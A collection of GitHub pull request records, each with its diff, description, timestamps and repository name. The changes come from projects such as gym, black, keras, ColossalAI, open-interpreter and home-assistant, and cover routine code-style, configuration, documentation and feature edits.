stacklevel=stacklevel + 1,
)
@@ -45,7 +45,7 @@ def deprecation(msg, *args):
def error(msg, *args):
if MIN_LEVEL <= ERROR:
- print(colorize("%s: %s" % ("ERROR", msg % args), "red"), file=sys.stderr)
+ print(colorize(f"ERROR: {msg % args}", "red"), file=sys.stderr)
# DEPRECATED:
|
This PR upgrades syntax to use py36+ idioms in gym/*.py (no subfolders), as suggested in #2462.
It's derived automatically by running pyupgrade --py36-plus and flynt -ll 120, no manual modifications were done.
Quality control: visual inspection of the diff, unit tests pass.
|
https://api.github.com/repos/openai/gym/pulls/2473
|
2021-10-30T14:49:40Z
|
2021-11-14T13:50:40Z
|
2021-11-14T13:50:40Z
|
2021-11-14T13:50:40Z
| 1,132
|
openai/gym
| 5,627
|
Support OpenAI's new models.
|
diff --git a/interpreter/terminal_interface/start_terminal_interface.py b/interpreter/terminal_interface/start_terminal_interface.py
index 00471c931..a7f53e95f 100644
--- a/interpreter/terminal_interface/start_terminal_interface.py
+++ b/interpreter/terminal_interface/start_terminal_interface.py
@@ -357,15 +357,15 @@ def start_terminal_interface(interpreter):
### Set some helpful settings we know are likely to be true
- if interpreter.llm.model == "gpt-4-1106-preview":
+ if interpreter.llm.model.startswith("gpt-4") or interpreter.llm.model.startswith("openai/gpt-4"):
if interpreter.llm.context_window is None:
interpreter.llm.context_window = 128000
if interpreter.llm.max_tokens is None:
interpreter.llm.max_tokens = 4096
if interpreter.llm.supports_functions is None:
- interpreter.llm.supports_functions = True
+ interpreter.llm.supports_functions = False if "vision" in interpreter.llm.model else True
- if interpreter.llm.model == "gpt-3.5-turbo-1106":
+ if interpreter.llm.model.startswith("gpt-3.5-turbo") or interpreter.llm.model.startswith("openai/gpt-3.5-turbo"):
if interpreter.llm.context_window is None:
interpreter.llm.context_window = 16000
if interpreter.llm.max_tokens is None:
|
### Describe the changes you have made:
Add default context window and max tokens configs for OpenAI's new models: `gpt-4-turbo-preview`, `gpt-4-0125-preview`, and `gpt-4-1106-vision-preview`.
### Reference any relevant issues (e.g. "Fixes #000"):
If we can keep these configs updated with as more models as possible, maybe can avoid issues like #915
### Pre-Submission Checklist (optional but appreciated):
- [x] I have included relevant documentation updates (stored in /docs)
- [x] I have read `docs/CONTRIBUTING.md`
- [x] I have read `docs/ROADMAP.md`
### OS Tests (optional but appreciated):
- [x] Tested on Windows
- [x] Tested on MacOS
- [x] Tested on Linux
|
https://api.github.com/repos/OpenInterpreter/open-interpreter/pulls/1099
|
2024-03-19T07:05:22Z
|
2024-03-24T07:49:41Z
|
2024-03-24T07:49:41Z
|
2024-03-24T07:53:04Z
| 322
|
OpenInterpreter/open-interpreter
| 40,686
|
Added professional events
|
diff --git a/README.md b/README.md
index da7fb015..1c775d4b 100644
--- a/README.md
+++ b/README.md
@@ -12,6 +12,8 @@ Further resources:
* For a list of free machine learning books available for download, go [here](https://github.com/josephmisiti/awesome-machine-learning/blob/master/books.md).
+* For a list of professional machine learning events, go [here](https://github.com/josephmisiti/awesome-machine-learning/blob/master/events.md).
+
* For a list of (mostly) free machine learning courses available online, go [here](https://github.com/josephmisiti/awesome-machine-learning/blob/master/courses.md).
* For a list of blogs and newsletters on data science and machine learning, go [here](https://github.com/josephmisiti/awesome-machine-learning/blob/master/blogs.md).
diff --git a/events.md b/events.md
new file mode 100644
index 00000000..5691233c
--- /dev/null
+++ b/events.md
@@ -0,0 +1,5 @@
+The following is a list of professional events on Machine Learning and Artificial Intelligence
+
+## Machine Learning and Artificial Intelligence
+
+* [AI & ML Events](https://aiml.events) - The best upcoming hand-picked conferences and exhibitions in the field of artificial intelligence and machine learning
|
https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/659
|
2020-01-05T09:33:02Z
|
2020-01-27T14:57:05Z
|
2020-01-27T14:57:05Z
|
2020-01-27T14:57:05Z
| 310
|
josephmisiti/awesome-machine-learning
| 51,755
|
|
[NFC] polish colossalai/amp/naive_amp/_fp16_optimizer.py code style
|
diff --git a/colossalai/amp/naive_amp/_fp16_optimizer.py b/colossalai/amp/naive_amp/_fp16_optimizer.py
index 58d9e3df116e..b01a3cbf0108 100644
--- a/colossalai/amp/naive_amp/_fp16_optimizer.py
+++ b/colossalai/amp/naive_amp/_fp16_optimizer.py
@@ -9,14 +9,16 @@
except:
print('Colossalai should be built with cuda extension to use the FP16 optimizer')
+from torch.distributed import ProcessGroup
from torch.optim import Optimizer
-from colossalai.core import global_context as gpc
+
from colossalai.context import ParallelMode
+from colossalai.core import global_context as gpc
from colossalai.logging import get_dist_logger
-from colossalai.utils import (copy_tensor_parallel_attributes, clip_grad_norm_fp32, multi_tensor_applier)
-from torch.distributed import ProcessGroup
-from .grad_scaler import BaseGradScaler
+from colossalai.utils import clip_grad_norm_fp32, copy_tensor_parallel_attributes, multi_tensor_applier
+
from ._utils import has_inf_or_nan, zero_gard_by_list
+from .grad_scaler import BaseGradScaler
__all__ = ['FP16Optimizer']
@@ -41,7 +43,7 @@ def _multi_tensor_copy_this_to_that(this, that, overflow_buf=None):
class FP16Optimizer(Optimizer):
"""Float16 optimizer for fp16 and bf16 data types.
-
+
Args:
optimizer (torch.optim.Optimizer): base optimizer such as Adam or SGD
grad_scaler (BaseGradScaler): grad scaler for gradient chose in
|
- [NFC] polish colossalai/amp/naive_amp/_fp16_optimizer.py code style
|
https://api.github.com/repos/hpcaitech/ColossalAI/pulls/1819
|
2022-11-08T06:42:45Z
|
2022-11-08T07:07:02Z
|
2022-11-08T07:07:02Z
|
2022-11-08T07:07:02Z
| 372
|
hpcaitech/ColossalAI
| 11,497
|
make error message on accessing private attributes more representative
|
diff --git a/gym/core.py b/gym/core.py
index f335b9f60ab..e8d2ff0f282 100644
--- a/gym/core.py
+++ b/gym/core.py
@@ -225,7 +225,7 @@ def __init__(self, env: Env):
def __getattr__(self, name):
if name.startswith("_"):
- raise AttributeError(f"attempted to get missing private attribute '{name}'")
+ raise AttributeError(f"accessing private attribute '{name}' is prohibited")
return getattr(self.env, name)
@property
|
This error message was kinda misleading.
The code is checking if a private attributes is accessed and then raises an error.
|
https://api.github.com/repos/openai/gym/pulls/2714
|
2022-03-23T15:55:40Z
|
2022-03-24T18:10:07Z
|
2022-03-24T18:10:07Z
|
2022-03-24T18:10:07Z
| 132
|
openai/gym
| 5,000
|
📝 Update release notes, move and check latest-changes
|
diff --git a/docs/en/docs/release-notes.md b/docs/en/docs/release-notes.md
index b0c13f5af0d51..186d2117cc16b 100644
--- a/docs/en/docs/release-notes.md
+++ b/docs/en/docs/release-notes.md
@@ -7,6 +7,8 @@ hide:
## Latest Changes
+### Internal
+
* 👷 Upgrade latest-changes GitHub Action. PR [#10587](https://github.com/tiangolo/fastapi/pull/10587) by [@tiangolo](https://github.com/tiangolo).
## 0.104.1
|
📝 Update release notes, move and check latest-changes
|
https://api.github.com/repos/tiangolo/fastapi/pulls/10588
|
2023-11-04T01:58:51Z
|
2023-11-04T02:02:18Z
|
2023-11-04T02:02:18Z
|
2023-11-04T02:02:19Z
| 135
|
tiangolo/fastapi
| 23,289
|
Use lowercase hex numbers fixes #1692
|
diff --git a/.gitignore b/.gitignore
index 3207e72ae28..30225ec7764 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,4 @@
+.venv
.coverage
_build
.DS_Store
@@ -15,4 +16,4 @@ src/_black_version.py
.dmypy.json
*.swp
.hypothesis/
-venv/
\ No newline at end of file
+venv/
diff --git a/CHANGES.md b/CHANGES.md
index 240abe302a4..67697bd7b07 100644
--- a/CHANGES.md
+++ b/CHANGES.md
@@ -21,6 +21,8 @@
- Added support for PEP 614 relaxed decorator syntax on python 3.9 (#1711)
+- use lowercase hex strings (#1692)
+
#### _Packaging_
- Self-contained native _Black_ binaries are now provided for releases via GitHub
diff --git a/src/black/__init__.py b/src/black/__init__.py
index 7e13a5d33f5..44edeb0d9f1 100644
--- a/src/black/__init__.py
+++ b/src/black/__init__.py
@@ -5192,31 +5192,52 @@ def normalize_numeric_literal(leaf: Leaf) -> None:
# Leave octal and binary literals alone.
pass
elif text.startswith("0x"):
- # Change hex literals to upper case.
- before, after = text[:2], text[2:]
- text = f"{before}{after.upper()}"
+ text = format_hex(text)
elif "e" in text:
- before, after = text.split("e")
- sign = ""
- if after.startswith("-"):
- after = after[1:]
- sign = "-"
- elif after.startswith("+"):
- after = after[1:]
- before = format_float_or_int_string(before)
- text = f"{before}e{sign}{after}"
+ text = format_scientific_notation(text)
elif text.endswith(("j", "l")):
- number = text[:-1]
- suffix = text[-1]
- # Capitalize in "2L" because "l" looks too similar to "1".
- if suffix == "l":
- suffix = "L"
- text = f"{format_float_or_int_string(number)}{suffix}"
+ text = format_long_or_complex_number(text)
else:
text = format_float_or_int_string(text)
leaf.value = text
+def format_hex(text: str) -> str:
+ """
+ Formats a hexadecimal string like "0x12b3"
+
+ Uses lowercase because of similarity between "B" and "8", which
+ can cause security issues.
+ see: https://github.com/psf/black/issues/1692
+ """
+
+ before, after = text[:2], text[2:]
+ return f"{before}{after.lower()}"
+
+
+def format_scientific_notation(text: str) -> str:
+ """Formats a numeric string utilizing scentific notation"""
+ before, after = text.split("e")
+ sign = ""
+ if after.startswith("-"):
+ after = after[1:]
+ sign = "-"
+ elif after.startswith("+"):
+ after = after[1:]
+ before = format_float_or_int_string(before)
+ return f"{before}e{sign}{after}"
+
+
+def format_long_or_complex_number(text: str) -> str:
+ """Formats a long or complex string like `10L` or `10j`"""
+ number = text[:-1]
+ suffix = text[-1]
+ # Capitalize in "2L" because "l" looks too similar to "1".
+ if suffix == "l":
+ suffix = "L"
+ return f"{format_float_or_int_string(number)}{suffix}"
+
+
def format_float_or_int_string(text: str) -> str:
"""Formats a float string like "1.0"."""
if "." not in text:
diff --git a/src/black_primer/primer.json b/src/black_primer/primer.json
index cdc863ca032..32df01571a7 100644
--- a/src/black_primer/primer.json
+++ b/src/black_primer/primer.json
@@ -10,7 +10,7 @@
},
"attrs": {
"cli_arguments": [],
- "expect_formatting_changes": false,
+ "expect_formatting_changes": true,
"git_clone_url": "https://github.com/python-attrs/attrs.git",
"long_checkout": false,
"py_versions": ["all"]
@@ -47,7 +47,7 @@
},
"hypothesis": {
"cli_arguments": [],
- "expect_formatting_changes": false,
+ "expect_formatting_changes": true,
"git_clone_url": "https://github.com/HypothesisWorks/hypothesis.git",
"long_checkout": false,
"py_versions": ["all"]
@@ -63,7 +63,7 @@
},
"pillow": {
"cli_arguments": [],
- "expect_formatting_changes": false,
+ "expect_formatting_changes": true,
"git_clone_url": "https://github.com/python-pillow/Pillow.git",
"long_checkout": false,
"py_versions": ["all"]
@@ -77,7 +77,7 @@
},
"pyramid": {
"cli_arguments": [],
- "expect_formatting_changes": false,
+ "expect_formatting_changes": true,
"git_clone_url": "https://github.com/Pylons/pyramid.git",
"long_checkout": false,
"py_versions": ["all"]
@@ -112,7 +112,7 @@
},
"virtualenv": {
"cli_arguments": [],
- "expect_formatting_changes": false,
+ "expect_formatting_changes": true,
"git_clone_url": "https://github.com/pypa/virtualenv.git",
"long_checkout": false,
"py_versions": ["all"]
diff --git a/src/blib2to3/pytree.py b/src/blib2to3/pytree.py
index 4b841b768e7..6dba3c7bb15 100644
--- a/src/blib2to3/pytree.py
+++ b/src/blib2to3/pytree.py
@@ -34,7 +34,7 @@
import sys
from io import StringIO
-HUGE: int = 0x7FFFFFFF # maximum repeat count, default max
+HUGE: int = 0x7fffffff # maximum repeat count, default max
_type_reprs: Dict[int, Union[Text, int]] = {}
diff --git a/test_requirements.txt b/test_requirements.txt
index 3e65cdb669f..9f69b8edf83 100644
--- a/test_requirements.txt
+++ b/test_requirements.txt
@@ -2,4 +2,4 @@ pytest >= 6.1.1
pytest-mock >= 3.3.1
pytest-cases >= 2.3.0
coverage >= 5.3
-parameterized >= 0.7.4
\ No newline at end of file
+parameterized >= 0.7.4
diff --git a/tests/data/numeric_literals.py b/tests/data/numeric_literals.py
index 254da68d330..06b7f7758ee 100644
--- a/tests/data/numeric_literals.py
+++ b/tests/data/numeric_literals.py
@@ -12,7 +12,7 @@
x = 123456789E123456789
x = 123456789J
x = 123456789.123456789J
-x = 0XB1ACC
+x = 0Xb1aCc
x = 0B1011
x = 0O777
x = 0.000000006
@@ -36,7 +36,7 @@
x = 123456789e123456789
x = 123456789j
x = 123456789.123456789j
-x = 0xB1ACC
+x = 0xb1acc
x = 0b1011
x = 0o777
x = 0.000000006
diff --git a/tests/data/numeric_literals_py2.py b/tests/data/numeric_literals_py2.py
index 8f85c43f265..8b2c7faa306 100644
--- a/tests/data/numeric_literals_py2.py
+++ b/tests/data/numeric_literals_py2.py
@@ -3,7 +3,7 @@
x = 123456789L
x = 123456789l
x = 123456789
-x = 0xb1acc
+x = 0xB1aCc
# output
@@ -13,4 +13,4 @@
x = 123456789L
x = 123456789L
x = 123456789
-x = 0xB1ACC
+x = 0xb1acc
diff --git a/tests/data/numeric_literals_skip_underscores.py b/tests/data/numeric_literals_skip_underscores.py
index e345bb90276..f83e23312f2 100644
--- a/tests/data/numeric_literals_skip_underscores.py
+++ b/tests/data/numeric_literals_skip_underscores.py
@@ -3,7 +3,7 @@
x = 123456789
x = 1_2_3_4_5_6_7
x = 1E+1
-x = 0xb1acc
+x = 0xb1AcC
x = 0.00_00_006
x = 12_34_567J
x = .1_2
@@ -16,8 +16,8 @@
x = 123456789
x = 1_2_3_4_5_6_7
x = 1e1
-x = 0xB1ACC
+x = 0xb1acc
x = 0.00_00_006
x = 12_34_567j
x = 0.1_2
-x = 1_2.0
\ No newline at end of file
+x = 1_2.0
|
First PR onto black. Please tell me if i did something wrong according to your ordinary rules.
The issue, #1692, argues whether we/you should "simply" do this, as it might impact source code of a large set of users, however you can either merge it if you like it or wait if not. :) Please write me if I can do anything in that regard.
I created two seperate commits:
- Made hex lower case
- Refactored numeric formatting section
This was done to seperate the two focus points, the first one solves the issue, whereas the second adds a bit of refactoring to that part of the code. Whether my version has a higher code quality or not, is definitely subjective, so please ignore it and cherry-pick if you dislike it :)
I am looking forward to contributing to black, long time user, and all that, so I hope you like it. I'll try to do something once in a while - Am doing this as part of hacktoberfest though, so if you can either label it `hacktoberfest-accepted` or merge it before the end of the month, that will be great ;) I feel super cheap writing that, but i am trying to pimp my bike with a yearly sticker from hacktoberfest, and this month is running a bit short. If any changes are needed, I'll gladly make those :)
Thank you!
|
https://api.github.com/repos/psf/black/pulls/1775
|
2020-10-21T16:07:38Z
|
2020-11-13T15:25:18Z
|
2020-11-13T15:25:18Z
|
2020-11-14T10:56:56Z
| 2,288
|
psf/black
| 23,660
|
Fix docs for Command type
|
diff --git a/README.md b/README.md
index 27e8b9ecf..c986e0527 100644
--- a/README.md
+++ b/README.md
@@ -298,7 +298,7 @@ side_effect(old_command: Command, fixed_command: str) -> None
```
and optional `enabled_by_default`, `requires_output` and `priority` variables.
-`Command` has three attributes: `script`, `stdout`, `stderr` and `script_parts`.
+`Command` has four attributes: `script`, `stdout`, `stderr` and `script_parts`.
Rule shouldn't change `Command`.
|

|
https://api.github.com/repos/nvbn/thefuck/pulls/680
|
2017-08-23T06:15:32Z
|
2017-08-23T06:37:13Z
|
2017-08-23T06:37:13Z
|
2017-08-23T06:37:13Z
| 140
|
nvbn/thefuck
| 30,590
|
Small fixes for Neural_Doodle example
|
diff --git a/examples/neural_doodle.py b/examples/neural_doodle.py
index c4133d8fed2..20907893b58 100644
--- a/examples/neural_doodle.py
+++ b/examples/neural_doodle.py
@@ -196,8 +196,8 @@ def load_mask_labels():
for layer in image_model.layers[1:]:
name = 'mask_%s' % layer.name
if 'conv' in layer.name:
- x = AveragePooling2D((3, 3), strides=(
- 1, 1), name=name, border_mode='same')(x)
+ x = AveragePooling2D((3, 3), padding='same', strides=(
+ 1, 1), name=name)(x)
elif 'pool' in layer.name:
x = AveragePooling2D((2, 2), name=name)(x)
mask_model = Model(mask_input, x)
@@ -238,6 +238,7 @@ def region_style_loss(style_image, target_image, style_mask, target_mask):
masked_target = K.permute_dimensions(
target_image, (2, 0, 1)) * target_mask
num_channels = K.shape(style_image)[-1]
+ num_channels = K.cast(num_channels, dtype='float32')
s = gram_matrix(masked_style) / K.mean(style_mask) / num_channels
c = gram_matrix(masked_target) / K.mean(target_mask) / num_channels
return K.mean(K.square(s - c))
|
1) Fixed type cast in region_style_loss() which prevented example to run: K.shape returns int32, but variable was immediately used in division operation which requires float32.
```
File "neural_doodle.py", line 241, in region_style_loss
s = gram_matrix(masked_style) / K.mean(style_mask) / num_channels
ValueError: Tensor conversion requested dtype float32 for Tensor with dtype int32: 'Tensor("strided_slice_8:0", shape=(), dtype=int32)'
```
2) Also updated argument in AveragePooling2D usage to match Keras2 API. Put 'padding' instead of older 'border_mode'
```
neural_doodle.py:200: UserWarning: Update your `AveragePooling2D` call to the Keras 2 API: `AveragePooling2D((3, 3), padding="same", strides=(1, 1), name="mask_block1_conv1")`
1, 1), name=name, border_mode='same')(x)
```
|
https://api.github.com/repos/keras-team/keras/pulls/6577
|
2017-05-10T11:26:48Z
|
2017-05-11T21:33:40Z
|
2017-05-11T21:33:40Z
|
2017-05-11T21:33:40Z
| 332
|
keras-team/keras
| 47,688
|
Support for masking in merged layers
|
diff --git a/keras/backend/tensorflow_backend.py b/keras/backend/tensorflow_backend.py
index 2616ec6d7b1..833d31019c1 100644
--- a/keras/backend/tensorflow_backend.py
+++ b/keras/backend/tensorflow_backend.py
@@ -339,6 +339,17 @@ def any(x, axis=None, keepdims=False):
return tf.cast(x, tf.uint8)
+def all(x, axis=None, keepdims=False):
+ '''Bitwise reduction (logical AND).
+
+ Returns an uint8 tensor
+ '''
+ axis = _normalize_axis(axis, ndim(x))
+ x = tf.cast(x, tf.bool)
+ x = tf.reduce_all(x, reduction_indices=axis, keep_dims=keepdims)
+ return tf.cast(x, tf.uint8)
+
+
def argmax(x, axis=-1):
'''Returns the index of the maximum value
along a tensor axis.
diff --git a/keras/backend/theano_backend.py b/keras/backend/theano_backend.py
index 8c391e4bb1b..13a21a80493 100644
--- a/keras/backend/theano_backend.py
+++ b/keras/backend/theano_backend.py
@@ -202,6 +202,12 @@ def any(x, axis=None, keepdims=False):
return T.any(x, axis=axis, keepdims=keepdims)
+def all(x, axis=None, keepdims=False):
+ '''Bitwise reduction (logical AND).
+ '''
+ return T.all(x, axis=axis, keepdims=keepdims)
+
+
def argmax(x, axis=-1):
return T.argmax(x, axis=axis, keepdims=False)
diff --git a/keras/engine/topology.py b/keras/engine/topology.py
index 30942286a4e..a26e43982f6 100644
--- a/keras/engine/topology.py
+++ b/keras/engine/topology.py
@@ -1073,9 +1073,12 @@ class Merge(Layer):
tensor_indices: optional list of indices of output tensors
to consider for merging
(in case some input layer node returns multiple tensors).
+ output_mask: mask or lambda/function to compute the output mask (only
+ if merge mode is a lambda/function). If the latter case, it should
+ take as input a list of masks and return a single mask.
'''
def __init__(self, layers=None, mode='sum', concat_axis=-1,
- dot_axes=-1, output_shape=None,
+ dot_axes=-1, output_shape=None, output_mask=None,
node_indices=None, tensor_indices=None, name=None):
self.layers = layers
self.mode = mode
@@ -1085,6 +1088,7 @@ def __init__(self, layers=None, mode='sum', concat_axis=-1,
self.dot_axes = [self.dot_axes, ] * 2
self._output_shape = output_shape
self.node_indices = node_indices
+ self._output_mask = output_mask
# layer parameters
self.inbound_nodes = []
@@ -1093,7 +1097,7 @@ def __init__(self, layers=None, mode='sum', concat_axis=-1,
self.regularizers = []
self.trainable_weights = []
self.non_trainable_weights = []
- self.supports_masking = False
+ self.supports_masking = True
self.uses_learning_phase = False
self.input_spec = None # compatible with whatever
if not name:
@@ -1317,13 +1321,30 @@ def get_output_shape_for(self, input_shape):
elif self.mode == 'cos':
return (input_shapes[0][0], 1)
- def compute_mask(self, input, mask=None):
- '''TODO: add mask merging support
- '''
- if mask is not None and any(mask):
- raise Exception('Merge does not support masking, ' +
- 'but was passed an input mask: ' + str(mask))
- return None
+ def compute_mask(self, inputs, mask=None):
+ if mask is None or not any([m is not None for m in mask]):
+ return None
+
+ assert hasattr(mask, '__len__') and len(mask) == len(inputs)
+
+ if self.mode in ['sum', 'mul', 'ave']:
+ masks = [K.expand_dims(m, 0) for m in mask if m is not None]
+ return K.all(K.concatenate(masks, axis=0), axis=0, keepdims=False)
+ elif self.mode == 'concat':
+ masks = [K.ones_like(inputs[i][:-1]) if m is None else m for i, m in zip(inputs, mask)]
+ expanded_dims = [K.expand_dims(m) for m in masks]
+ concatenated = K.concatenate(expanded_dims, axis=self.concat_axis)
+ return K.all(concatenated, axis=-1, keepdims=False)
+ elif self.mode in ['cos', 'dot']:
+ return None
+ elif hasattr(self.mode, '__call__'):
+ if hasattr(self._output_mask, '__call__'):
+ return self._output_mask(mask)
+ else:
+ return self._output_mask
+ else:
+ # this should have been caught earlier
+ raise Exception('Invalid merge mode: {}'.format(self.mode))
def get_config(self):
py3 = sys.version_info[0] == 3
@@ -1388,7 +1409,7 @@ def from_config(cls, config):
def merge(inputs, mode='sum', concat_axis=-1,
- dot_axes=-1, output_shape=None, name=None):
+ dot_axes=-1, output_shape=None, output_mask=None, name=None):
'''Functional merge, to apply to Keras tensors (NOT layers).
Returns a Keras tensor.
@@ -1437,6 +1458,7 @@ def merge(inputs, mode='sum', concat_axis=-1,
concat_axis=concat_axis,
dot_axes=dot_axes,
output_shape=output_shape,
+ output_mask=output_mask,
node_indices=node_indices,
tensor_indices=tensor_indices,
name=name)
@@ -1446,6 +1468,7 @@ def merge(inputs, mode='sum', concat_axis=-1,
concat_axis=concat_axis,
dot_axes=dot_axes,
output_shape=output_shape,
+ output_mask=output_mask,
name=name)
return merge_layer(inputs)
diff --git a/keras/layers/core.py b/keras/layers/core.py
index b7c20c4f7bc..75f83f7cd8b 100644
--- a/keras/layers/core.py
+++ b/keras/layers/core.py
@@ -402,6 +402,8 @@ def antirectifier_output_shape(input_shape):
def __init__(self, function, output_shape=None, arguments={}, **kwargs):
self.function = function
self.arguments = arguments
+ self.supports_masking = True
+
if output_shape is None:
self._output_shape = None
elif type(output_shape) in {tuple, list}:
diff --git a/tests/keras/backend/test_backends.py b/tests/keras/backend/test_backends.py
index 465d1dae455..fb4b2647464 100644
--- a/tests/keras/backend/test_backends.py
+++ b/tests/keras/backend/test_backends.py
@@ -139,6 +139,9 @@ def test_elementwise_operations(self):
# does not work yet, wait for bool <-> int casting in TF (coming soon)
# check_single_tensor_operation('any', (4, 2))
# check_single_tensor_operation('any', (4, 2), axis=1, keepdims=True)
+ #
+ # check_single_tensor_operation('any', (4, 2))
+ # check_single_tensor_operation('any', (4, 2), axis=1, keepdims=True)
check_single_tensor_operation('argmax', (4, 2))
check_single_tensor_operation('argmax', (4, 2), axis=1)
diff --git a/tests/keras/layers/test_core.py b/tests/keras/layers/test_core.py
index 281e5ce61af..bbeab907865 100644
--- a/tests/keras/layers/test_core.py
+++ b/tests/keras/layers/test_core.py
@@ -1,6 +1,5 @@
import pytest
import numpy as np
-from numpy.testing import assert_allclose
from keras import backend as K
from keras.layers import core
@@ -84,6 +83,60 @@ def fn_output_shape(tup):
model.compile('rmsprop', 'mse')
+def test_merge_mask_2d():
+ from keras.layers import Input, merge, Masking
+ from keras.models import Model
+
+ rand = lambda *shape: np.asarray(np.random.random(shape) > 0.5, dtype='int32')
+
+ # inputs
+ input_a = Input(shape=(3,))
+ input_b = Input(shape=(3,))
+
+ # masks
+ masked_a = Masking(mask_value=0)(input_a)
+ masked_b = Masking(mask_value=0)(input_b)
+
+ # two different types of merging
+ merged_sum = merge([masked_a, masked_b], mode='sum')
+ merged_concat = merge([masked_a, masked_b], mode='concat', concat_axis=1)
+
+ # test sum
+ model_sum = Model([input_a, input_b], [merged_sum])
+ model_sum.compile(loss='mse', optimizer='sgd')
+ model_sum.fit([rand(2,3), rand(2,3)], [rand(2,3)], nb_epoch=1)
+
+ # test concatenation
+ model_concat = Model([input_a, input_b], [merged_concat])
+ model_concat.compile(loss='mse', optimizer='sgd')
+ model_concat.fit([rand(2,3), rand(2,3)], [rand(2,6)], nb_epoch=1)
+
+
+def test_merge_mask_3d():
+ from keras.layers import Input, merge, Embedding, SimpleRNN
+ from keras.models import Model
+
+ rand = lambda *shape: np.asarray(np.random.random(shape) > 0.5, dtype='int32')
+
+ # embeddings
+ input_a = Input(shape=(3,), dtype='int32')
+ input_b = Input(shape=(3,), dtype='int32')
+ embedding = Embedding(3, 4, mask_zero=True)
+ embedding_a = embedding(input_a)
+ embedding_b = embedding(input_b)
+
+ # rnn
+ rnn = SimpleRNN(3, return_sequences=True)
+ rnn_a = rnn(embedding_a)
+ rnn_b = rnn(embedding_b)
+
+ # concatenation
+ merged_concat = merge([rnn_a, rnn_b], mode='concat', concat_axis=-1)
+ model = Model([input_a, input_b], [merged_concat])
+ model.compile(loss='mse', optimizer='sgd')
+ model.fit([rand(2,3), rand(2,3)], [rand(2,3,6)])
+
+
def test_dropout():
layer_test(core.Dropout,
kwargs={'p': 0.5},
|
I've seen a couple other people who seem like they need masking in merged layers. As far as I can tell, masking is only required for the `'sum'` and `'ave'` modes (and lambda functions as well probably, but those are a case of their own). I've only tested this fork with Theano + Python 2.7, but it seems to be working.
I did notice some weird behavior with the `Masking` layer. If given this data,
```
input a data:
[[ 1. 1. 1.]
[ 1. 1. 1.]]
input b data:
[[ 1. 1. 0.]
[ 0. 0. 0.]]
```
for some model that adds the inputs but masks 0's in the second input,
```
input_a = Input(shape=(3,), dtype='int32')
input_b = Input(shape=(3,), dtype='int32')
masked_b = Masking(mask_value=0)(input_b)
merged = merge([input_a, masked_b], mode='sum')
```
it gives
```
[[ 3. 3. 2.]
[ 0. 0. 0.]]
```
Is this the correct behavior? It was my best guess at what it should be doing. Also, I haven't tried this with `mask_zeros` in the `Embedding` layer, which seems like the most common use case.
Also, I'm not sure how to go about adding support for lambda functions, since this also seems useful. I thought maybe adding an `output_mask` parameter that takes a list of (normalized) masks and returns the output mask, but this seems clunky.
|
https://api.github.com/repos/keras-team/keras/pulls/2413
|
2016-04-20T02:13:43Z
|
2016-06-23T19:03:55Z
|
2016-06-23T19:03:55Z
|
2016-10-22T21:27:06Z
| 2,532
|
keras-team/keras
| 47,630
|
Avoid entity registry check in live logbook on each state update
|
diff --git a/homeassistant/components/logbook/helpers.py b/homeassistant/components/logbook/helpers.py
index c2ea9823535818..6bfd88c976a0a1 100644
--- a/homeassistant/components/logbook/helpers.py
+++ b/homeassistant/components/logbook/helpers.py
@@ -171,7 +171,6 @@ def async_subscribe_events(
These are the events we need to listen for to do
the live logbook stream.
"""
- ent_reg = er.async_get(hass)
assert is_callback(target), "target must be a callback"
event_forwarder = event_forwarder_filtered(
target, entities_filter, entity_ids, device_ids
@@ -193,7 +192,7 @@ def _forward_state_events_filtered(event: EventType[EventStateChangedData]) -> N
new_state := event.data["new_state"]
) is None:
return
- if _is_state_filtered(ent_reg, new_state, old_state) or (
+ if _is_state_filtered(new_state, old_state) or (
entities_filter and not entities_filter(new_state.entity_id)
):
return
@@ -232,9 +231,7 @@ def is_sensor_continuous(ent_reg: er.EntityRegistry, entity_id: str) -> bool:
)
-def _is_state_filtered(
- ent_reg: er.EntityRegistry, new_state: State, old_state: State
-) -> bool:
+def _is_state_filtered(new_state: State, old_state: State) -> bool:
"""Check if the logbook should filter a state.
Used when we are in live mode to ensure
@@ -245,7 +242,7 @@ def _is_state_filtered(
or split_entity_id(new_state.entity_id)[0] in ALWAYS_CONTINUOUS_DOMAINS
or new_state.last_changed != new_state.last_updated
or ATTR_UNIT_OF_MEASUREMENT in new_state.attributes
- or is_sensor_continuous(ent_reg, new_state.entity_id)
+ or ATTR_STATE_CLASS in new_state.attributes
)
|
## Proposed change
<!--
Describe the big picture of your changes here to communicate to the
maintainers why we should accept this pull request. If it fixes a bug
or resolves a feature request, be sure to link to that issue in the
additional information section.
-->
There is no need to check the entity registry for the state class since we already have the state
## Type of change
<!--
What type of change does your PR introduce to Home Assistant?
NOTE: Please, check only 1! box!
If your PR requires multiple boxes to be checked, you'll most likely need to
split it into multiple PRs. This makes things easier and faster to code review.
-->
- [ ] Dependency upgrade
- [ ] Bugfix (non-breaking change which fixes an issue)
- [ ] New integration (thank you!)
- [ ] New feature (which adds functionality to an existing integration)
- [ ] Deprecation (breaking change to happen in the future)
- [ ] Breaking change (fix/feature causing existing functionality to break)
- [x] Code quality improvements to existing code or addition of tests
## Additional information
<!--
Details are important, and help maintainers processing your PR.
Please be sure to fill out additional details, if applicable.
-->
- This PR fixes or closes issue: fixes #
- This PR is related to issue:
- Link to documentation pull request:
## Checklist
<!--
Put an `x` in the boxes that apply. You can also fill these out after
creating the PR. If you're unsure about any of them, don't hesitate to ask.
We're here to help! This is simply a reminder of what we are going to look
for before merging your code.
-->
- [x] The code change is tested and works locally.
- [ ] Local tests pass. **Your PR cannot be merged unless tests pass**
- [ ] There is no commented out code in this PR.
- [ ] I have followed the [development checklist][dev-checklist]
- [ ] I have followed the [perfect PR recommendations][perfect-pr]
- [ ] The code has been formatted using Ruff (`ruff format homeassistant tests`)
- [ ] Tests have been added to verify that the new code works.
If user exposed functionality or configuration variables are added/changed:
- [ ] Documentation added/updated for [www.home-assistant.io][docs-repository]
If the code communicates with devices, web services, or third-party tools:
- [ ] The [manifest file][manifest-docs] has all fields filled out correctly.
Updated and included derived files by running: `python3 -m script.hassfest`.
- [ ] New or updated dependencies have been added to `requirements_all.txt`.
Updated by running `python3 -m script.gen_requirements_all`.
- [ ] For the updated dependencies - a link to the changelog, or at minimum a diff between library versions is added to the PR description.
- [ ] Untested files have been added to `.coveragerc`.
<!--
This project is very active and we have a high turnover of pull requests.
Unfortunately, the number of incoming pull requests is higher than what our
reviewers can review and merge so there is a long backlog of pull requests
waiting for review. You can help here!
